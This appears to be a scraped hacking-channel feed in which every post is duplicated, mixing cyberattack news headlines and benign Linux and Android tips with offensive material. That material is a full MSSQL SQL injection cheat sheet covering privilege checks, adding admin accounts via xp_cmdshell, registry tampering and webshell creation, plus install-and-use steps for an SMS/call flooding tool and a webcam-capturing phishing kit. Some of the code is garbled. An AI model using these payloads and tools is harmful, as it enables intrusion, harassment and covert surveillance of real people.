Forwarded from UNDERCODE NEWS
Clop ransomware organization attacked by E-Land Group, disclosed 100,000 credit card information as announced
#Malwares #CyberAttacks
#Malwares #CyberAttacks
β β β Uππ»βΊπ«Δπ¬πβ β β β
SQL manual injection statement & SQL manual injection Daquan:
Look at the following
1. Determine whether there is injection
; and 1=1
; and 1=2
2. Preliminarily determine whether it is mssql
; and user>0
3. Determine the database system
; and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4. The injected parameters are the characters'and
[query condition] and''='
5. When searching, there is no filter parameter
' and [query condition] and'%25 '='
6. Guess the database
; and (select Count(*) from [database name])>0
7. Guess the field
; and (select Count(field name) from database name)>0
8. Guess the record length in the field
; and (select top 1 len(field name) from database name)>0
9. (1) Guess the ascii value of the field (access)
; and (select top 1 asc(mid(field name,1,1)) from database name )>0
(2) Guess the ascii value of the field (mssql)
;and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test permission structure (mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1= (select IS_MEMBER('db_owner')); -
11.Add mssql and system accounts
; exec master.dbo.sp_addlogin username; -
;exec master.dbo.sp_password null,username,password; -
;exec master. dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell'net user username password /add';--
;exec master.dbo.xp_cmdshell'net localgroup administrators username /add';--
12.(1) Traverse directories
; create table dirs(paths varchar (100), id int)
;insert dirs exec master.dbo.xp_dirtree'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('δΈζ₯The obtained paths'))>)
(2) Traverse the directory
; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)); -
;insert temp exec master .dbo.xp_availablemedia; - get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs'c:\'; - get a list of subdirectories
; insert into temp(id,num1) exec master.dbo. xp_dirtree'c:\'; - get the directory tree structure of all subdirectories
;insert into temp(id) exec master.dbo.xp_cmdshell'type c:\web\index.asp';-- view the content of the file
13. The stored procedure
xp_regenumvalues ββin mssql registry root key, subkey
; exec xp_regenumvalues' HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' returns all key values ββin multiple record sets
xp_regread root key, subkey, key value name
; exec xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion' ,'CommonFilesDir' returns the value of the
specified key xp_regwrite root key, subkey, value name, value type, value
There are two types of value types. REG_SZ means character type, REG_DWORD means integer type
; exec xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows \CurrentVersion','TestvalueName','reg_sz','hello' write to the registry
xp_regdeletevalue root key, subkey, value name
exec xp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' delete a value
xp_regdeletekey'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' Delete key, including all values ββunder this key
14.mssql backup creation webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ( '');
backup database model to disk='c:\l.asp';
β β β Uππ»βΊπ«Δπ¬πβ β β β
SQL manual injection statement & SQL manual injection Daquan:
Look at the following
1. Determine whether there is injection
; and 1=1
; and 1=2
2. Preliminarily determine whether it is mssql
; and user>0
3. Determine the database system
; and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4. The injected parameters are the characters'and
[query condition] and''='
5. When searching, there is no filter parameter
' and [query condition] and'%25 '='
6. Guess the database
; and (select Count(*) from [database name])>0
7. Guess the field
; and (select Count(field name) from database name)>0
8. Guess the record length in the field
; and (select top 1 len(field name) from database name)>0
9. (1) Guess the ascii value of the field (access)
; and (select top 1 asc(mid(field name,1,1)) from database name )>0
(2) Guess the ascii value of the field (mssql)
;and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test permission structure (mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1= (select IS_MEMBER('db_owner')); -
11.Add mssql and system accounts
; exec master.dbo.sp_addlogin username; -
;exec master.dbo.sp_password null,username,password; -
;exec master. dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell'net user username password /add';--
;exec master.dbo.xp_cmdshell'net localgroup administrators username /add';--
12.(1) Traverse directories
; create table dirs(paths varchar (100), id int)
;insert dirs exec master.dbo.xp_dirtree'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('δΈζ₯The obtained paths'))>)
(2) Traverse the directory
; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)); -
;insert temp exec master .dbo.xp_availablemedia; - get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs'c:\'; - get a list of subdirectories
; insert into temp(id,num1) exec master.dbo. xp_dirtree'c:\'; - get the directory tree structure of all subdirectories
;insert into temp(id) exec master.dbo.xp_cmdshell'type c:\web\index.asp';-- view the content of the file
13. The stored procedure
xp_regenumvalues ββin mssql registry root key, subkey
; exec xp_regenumvalues' HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' returns all key values ββin multiple record sets
xp_regread root key, subkey, key value name
; exec xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion' ,'CommonFilesDir' returns the value of the
specified key xp_regwrite root key, subkey, value name, value type, value
There are two types of value types. REG_SZ means character type, REG_DWORD means integer type
; exec xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows \CurrentVersion','TestvalueName','reg_sz','hello' write to the registry
xp_regdeletevalue root key, subkey, value name
exec xp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' delete a value
xp_regdeletekey'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' Delete key, including all values ββunder this key
14.mssql backup creation webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ( '');
backup database model to disk='c:\l.asp';
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
With "remote" DX, JAL and ANA open up the future, transporting remote islands to space avatars
#Technologies #international
#Technologies #international
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
BEST FILE MANAGER FOR ANDROID:
https://play.google.com/store/apps/details?id=com.amaze.filemanager
https://play.google.com/store/apps/details?id=pl.solidexplorer2
https://play.google.com/store/apps/details?id=com.metago.astro
https://play.google.com/store/apps/details?id=com.cxinventor.file.explorer
https://play.google.com/store/apps/details?id=nextapp.fx
https://play.google.com/store/apps/details?id=com.mixplorer.silver
https://play.google.com/store/apps/details?id=pl.mkexplorer.kormateusz
https://play.google.com/store/apps/details?id=com.speedsoftware.rootexplorer
β β β Uππ»βΊπ«Δπ¬πβ β β β
BEST FILE MANAGER FOR ANDROID:
https://play.google.com/store/apps/details?id=com.amaze.filemanager
https://play.google.com/store/apps/details?id=pl.solidexplorer2
https://play.google.com/store/apps/details?id=com.metago.astro
https://play.google.com/store/apps/details?id=com.cxinventor.file.explorer
https://play.google.com/store/apps/details?id=nextapp.fx
https://play.google.com/store/apps/details?id=com.mixplorer.silver
https://play.google.com/store/apps/details?id=pl.mkexplorer.kormateusz
https://play.google.com/store/apps/details?id=com.speedsoftware.rootexplorer
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google Play
Amaze File Manager - Apps on Google Play
Open Source Material Design file manager for Android
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Muscovites share a common Instagram account with a million subscribers in court due to divorce.
#Leaks
#Leaks
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π Configuring SSH login without password for multiple remote servers using a script:
Create a new SSH key on Linux
First, generate an SSH key pair (the private / identity key that the SSH client uses to authenticate when logging into the remote SSH server, and the public key stored as an authorized key on the remote system running the SSH server) using ssh - keygen as follows:
# ssh-keygen
Creating bash script for multiple remote logins
Next, create a script to help copy the public key to multiple remote Linux hosts.
# vim ~ / .bin / ssh-copy.sh
Copy and paste the following code into a file (replace the following variables accordingly USER_NAME is the username to connect to, HOST_FILE is a file containing a list of hostnames or IP addresses, and ERROR_FILE is a file to store any ssh command errors).
#! / bin / bash
USER_NAME = "root"
HOST_FILE = "/ root / hosts"
ERROR_FILE = "/ tmp / ssh-copy_error.txt"
PUBLIC_KEY_FILE = "$ 1"
if [! -f $ PUBLIC_KEY_FILE]; then
echo "File '$ PUBLIC_KEY_FILE' not found!"
exit 1
fi
if [! -f $ HOST_FILE]; then
echo "File '$ HOST_FILE' not found!"
exit 2
fi
for IP in
ssh-copy-id -i $ PUBLIC_KEY_FILE $ USER_NAME @ $ IP 2> $ ERROR_FILE
RESULT = $?
if [$ RESULT -eq 0]; then
echo ""
echo "Public key copied to $ IP successfully"
echo ""
else
echo "$ (cat $ ERROR_FILE)"
echo
exit 3
fi
echo ""
done
Save the file and close it.
Then make the script executable with the chmod command, as follows:
# chmod + x ssh-copy.sh
Now run the ssh-copy.sh script and provide your public key file as the first argument as shown below:
# ./ssh-copy.sh /root/.ssh/prod-rsa.pub
Then use ssh-agent to manage your keys, which stores your decrypted private key in memory and uses it to authenticate logins.
After starting ssh-agent add your private key to it like this:
# eval "$ (ssh-agent -s)"
# ssh-add ~ / .ssh / prod_rsa
Login to remote Linux server without password
You can now log into any of your remote hosts without entering a password to authenticate the SSH user.
This way you can automate cross-server processes.
# ssh root@10.2.32.12
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π Configuring SSH login without password for multiple remote servers using a script:
Create a new SSH key on Linux
First, generate an SSH key pair (the private / identity key that the SSH client uses to authenticate when logging into the remote SSH server, and the public key stored as an authorized key on the remote system running the SSH server) using ssh - keygen as follows:
# ssh-keygen
Creating bash script for multiple remote logins
Next, create a script to help copy the public key to multiple remote Linux hosts.
# vim ~ / .bin / ssh-copy.sh
Copy and paste the following code into a file (replace the following variables accordingly USER_NAME is the username to connect to, HOST_FILE is a file containing a list of hostnames or IP addresses, and ERROR_FILE is a file to store any ssh command errors).
#! / bin / bash
USER_NAME = "root"
HOST_FILE = "/ root / hosts"
ERROR_FILE = "/ tmp / ssh-copy_error.txt"
PUBLIC_KEY_FILE = "$ 1"
if [! -f $ PUBLIC_KEY_FILE]; then
echo "File '$ PUBLIC_KEY_FILE' not found!"
exit 1
fi
if [! -f $ HOST_FILE]; then
echo "File '$ HOST_FILE' not found!"
exit 2
fi
for IP in
cat $ HOST_FILE; dossh-copy-id -i $ PUBLIC_KEY_FILE $ USER_NAME @ $ IP 2> $ ERROR_FILE
RESULT = $?
if [$ RESULT -eq 0]; then
echo ""
echo "Public key copied to $ IP successfully"
echo ""
else
echo "$ (cat $ ERROR_FILE)"
echo
exit 3
fi
echo ""
done
Save the file and close it.
Then make the script executable with the chmod command, as follows:
# chmod + x ssh-copy.sh
Now run the ssh-copy.sh script and provide your public key file as the first argument as shown below:
# ./ssh-copy.sh /root/.ssh/prod-rsa.pub
Then use ssh-agent to manage your keys, which stores your decrypted private key in memory and uses it to authenticate logins.
After starting ssh-agent add your private key to it like this:
# eval "$ (ssh-agent -s)"
# ssh-add ~ / .ssh / prod_rsa
Login to remote Linux server without password
You can now log into any of your remote hosts without entering a password to authenticate the SSH user.
This way you can automate cross-server processes.
# ssh root@10.2.32.12
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Renesas is a new product of Arm microcomputer that enables touchless operation 10 cm away.
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
How to Untar Files in Linux ?
First, letβs create a tar archive with several files and directories. Here, Iβve created a directory with the name βAntsβ that will be transformed into a tar archive.
$ tree Ants/
Now, letβs make a tar archive out of the directory. Here, tar will use various compression algorithms to do the job. Itβs a common practice that the compression algorithm dictates the output file name.
To create a tar archive using gzip compression, use the following command.
$ tar -cvzf ants.tar.gz <source_file_directory>
To create a tar archive using bzip2 compression, use the following command.
$ tar -cvjf ants.tar.bz2 <source_file_directory>
$ tar -cvJf ants.tar.xz <source_file_directory>
Extracting tar files
List tar content
The following tar command will list all the files and directories included in the tar archive.
$ tar -tvf <tar_archive>
The following tar command will extract any valid tar archive. If files with similar filenames exist, upon extraction, tar will overwrite the files outside the archive.
$ tar -xvf <tar_archive>
Here, weβre facing one new tar flag.
x: It tells tar to extract an archive.
If you donβt want tar to overwrite existing data, add the β-kβ flag. It tells tar not to overwrite/replace any existing file or directory.
$ tar -xvkf <tar_archive>
There are some situations where you donβt need the entire tar archive extracted only to grab a single file. The tar tool offers such flexibility that you can extract only the select few files you need.
For this task, the tar command structure would look like this. Here, the file name would be the file name of your desired file. It must match with the file name thatβs inside the tar archive.
$ tar -xvf <tar_archive> <filename>
If you want to extract a couple of files in such a manner, use the following command structure.
$ tar -xvf <tar_archive> <filename_1> <filename_2>
Unix forums
β β β Uππ»βΊπ«Δπ¬πβ β β β
How to Untar Files in Linux ?
First, letβs create a tar archive with several files and directories. Here, Iβve created a directory with the name βAntsβ that will be transformed into a tar archive.
$ tree Ants/
Now, letβs make a tar archive out of the directory. Here, tar will use various compression algorithms to do the job. Itβs a common practice that the compression algorithm dictates the output file name.
To create a tar archive using gzip compression, use the following command.
$ tar -cvzf ants.tar.gz <source_file_directory>
To create a tar archive using bzip2 compression, use the following command.
$ tar -cvjf ants.tar.bz2 <source_file_directory>
$ tar -cvJf ants.tar.xz <source_file_directory>
Extracting tar files
List tar content
The following tar command will list all the files and directories included in the tar archive.
$ tar -tvf <tar_archive>
The following tar command will extract any valid tar archive. If files with similar filenames exist, upon extraction, tar will overwrite the files outside the archive.
$ tar -xvf <tar_archive>
Here, weβre facing one new tar flag.
x: It tells tar to extract an archive.
If you donβt want tar to overwrite existing data, add the β-kβ flag. It tells tar not to overwrite/replace any existing file or directory.
$ tar -xvkf <tar_archive>
There are some situations where you donβt need the entire tar archive extracted only to grab a single file. The tar tool offers such flexibility that you can extract only the select few files you need.
For this task, the tar command structure would look like this. Here, the file name would be the file name of your desired file. It must match with the file name thatβs inside the tar archive.
$ tar -xvf <tar_archive> <filename>
If you want to extract a couple of files in such a manner, use the following command structure.
$ tar -xvf <tar_archive> <filename_1> <filename_2>
Unix forums
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Updated Impulse Denial-of-service ToolKit :
free SMS & Call flood:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) LINUX
1) sudo apt update
2) sudo apt install python3 python3-pip git -y
3) git clone https://github.com/LimerBoy/Impulse
4) cd Impulse/
5) pip3 install -r requirements.txt
6) python3 impulse.py --help
B) Termux:
1) pkg update
2) pkg install python3 python3-pip git -y
3) git clone https://github.com/LimerBoy/Impulse
4) cd Impulse/
5) pip3 install -r requirements.txt
6) python3 impulse.py --help
TO USE :
python3 impulse.py --method SMS --time 20 --threads 15 --target +(phone)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Updated Impulse Denial-of-service ToolKit :
free SMS & Call flood:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) LINUX
1) sudo apt update
2) sudo apt install python3 python3-pip git -y
3) git clone https://github.com/LimerBoy/Impulse
4) cd Impulse/
5) pip3 install -r requirements.txt
6) python3 impulse.py --help
B) Termux:
1) pkg update
2) pkg install python3 python3-pip git -y
3) git clone https://github.com/LimerBoy/Impulse
4) cd Impulse/
5) pip3 install -r requirements.txt
6) python3 impulse.py --help
TO USE :
python3 impulse.py --method SMS --time 20 --threads 15 --target +(phone)
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Campari, the hacker attack and the 15 million dollar ransom: "The data of 4,700 employees stolen"
#Leaks #Malwares
#Leaks #Malwares
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CamPhish is techniques to take cam shots of target's phone fornt camera or PC webcam. CamPhish Hosts a fake website on in built PHP server and uses ngrok & serveo to generate a link which we will forward to the target, which can be used on over internet. website asks for camera permission and if the target allows it, this tool grab camshots of target's device
Kali Linux
Termux
MacOS
Ubuntu
Perrot Sec OS
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
This tool require PHP for webserver, SSH or serveo link. First run following command on your terminal
1) apt-get -y install php openssh git wget
Installing (Kali Linux/Termux):
2) git clone https://github.com/techustad/hack
3) cd hack
4) bash camphish.sh
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CamPhish is techniques to take cam shots of target's phone fornt camera or PC webcam. CamPhish Hosts a fake website on in built PHP server and uses ngrok & serveo to generate a link which we will forward to the target, which can be used on over internet. website asks for camera permission and if the target allows it, this tool grab camshots of target's device
Kali Linux
Termux
MacOS
Ubuntu
Perrot Sec OS
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
This tool require PHP for webserver, SSH or serveo link. First run following command on your terminal
1) apt-get -y install php openssh git wget
Installing (Kali Linux/Termux):
2) git clone https://github.com/techustad/hack
3) cd hack
4) bash camphish.sh
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - techustad/hack
Contribute to techustad/hack development by creating an account on GitHub.